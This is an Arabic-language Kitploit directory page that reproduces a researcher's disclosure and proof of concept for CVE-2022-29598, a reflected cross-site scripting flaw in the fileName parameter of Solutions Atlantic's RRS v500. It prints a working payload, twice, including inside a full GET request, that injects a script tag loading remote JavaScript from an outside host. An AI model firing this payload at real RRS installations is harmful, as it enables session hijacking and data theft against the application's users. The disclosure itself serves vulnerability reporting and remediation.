Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-29598 — تطبيق RRS v500 معرّض لثغرة البرمجة النصية عبر المواقع (XSS) المنعكسة. | Kitploit
أدوات/GitHubGitHub/thegetch/cve-2022-29598
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراق
GitHubthegetch/cve-2022-29598

CVE-2022-29598

تطبيق RRS v500 معرّض لثغرة البرمجة النصية عبر المواقع (XSS) المنعكسة.

عرض المستودع
منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-29598 : البرمجة النصية عبر المواقع (XSS) المنعكسة في RSS v500

رابط Mitre: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29598

رابط NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-29598

تطبيق RRS الإصدار v500 من شركة Solutions Atlantic يعاني من ثغرة برمجة نصية عبر المواقع (XSS) منعكسة. يمكن أن يسمح استغلال ثغرة XSS للمهاجم بانتحال شخصية المستخدم الضحية، أو الكشف عن بيانات حساسة، أو تنفيذ إجراءات يُسمح للمستخدم الضحية بتنفيذها.

تبين أن المعامل fileName يقبل مدخلات المستخدم ويعكسها داخل استجابة الخادم. على الرغم من إجراء بعض تصفية وتنقية مدخلات المستخدم قبل الانعكاس، مثل ترميز بعض الأحرف الخاصة (رموز أكبر/أصغر من)، ونظرًا لأن الانعكاس حدث داخل سياق JavaScript، فقد يمكن حقن كود JavaScript في استجابة الخادم، متجاوزًا القيود.

الرابط المتأثر:

  • /RRSWeb/maint/ShowDocument/ShowDocument.aspx

حمولة XSS المستخدمة:

  • javascript:var%20x=document.createElement("script");x.src="https://thegetch.github.io/x";document.body.appendChild(x)';//

إثبات المفهوم (POC):

وظيفة عرض المستند:

الرابط المتأثر:

  • /RRSWeb/maint/ShowDocument/ShowDocument.aspx

يمتلك التطبيق القدرة على الارتباط بمواقع ويب خارجية. عند اختيار رابط إلى الموقع الخارجي، يتم إرسال طلب إلى /RRSWeb/maint/ShowDocument/ShowDocument.aspx مع معاملين: fileName، الذي سيحتوي على رابط الموقع الخارجي الذي سيتم إعادة التوجيه إليه، وrequestType، الذي ستكون قيمته ExternalLink. طالما تم ضبط معامل requestType على قيمته الافتراضية، فإن أي شيء يدخله المستخدم في معامل fileName سوف ينعكس في سياق JavaScript، وتحديدًا داخل window.location.href. باستخدام حمولة XSS مع توجيه JavaScript، يمكن تنفيذ هجوم XSS منعكس بنجاح.

طلب GET مع حمولة XSS:

root@kitploit:~
GET /RRSWeb/maint/ShowDocument/ShowDocument.aspx?requestType=ExternalLink&fileName=javascript:var%20x=document.createElement("script");x.src="https://thegetch.github.io/x";document.body.appendChild(x)';// HTTP/1.1
Host: <REDACTED>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://<REDACTED>/RRSweb/default.aspx
Cookie: ASP.NET_SessionId=<REDACTED>
Upgrade-Insecure-Requests: 1
Content-Length: 0


استجابة الخادم:

01_RRS_XSS_Response_JS_Directive

معروض في المتصفح:

02_RRS_XSS_Rendered

الاكتشاف

أبريل 2022

  • Eric Getchell - TheGetch
تنزيل الأداة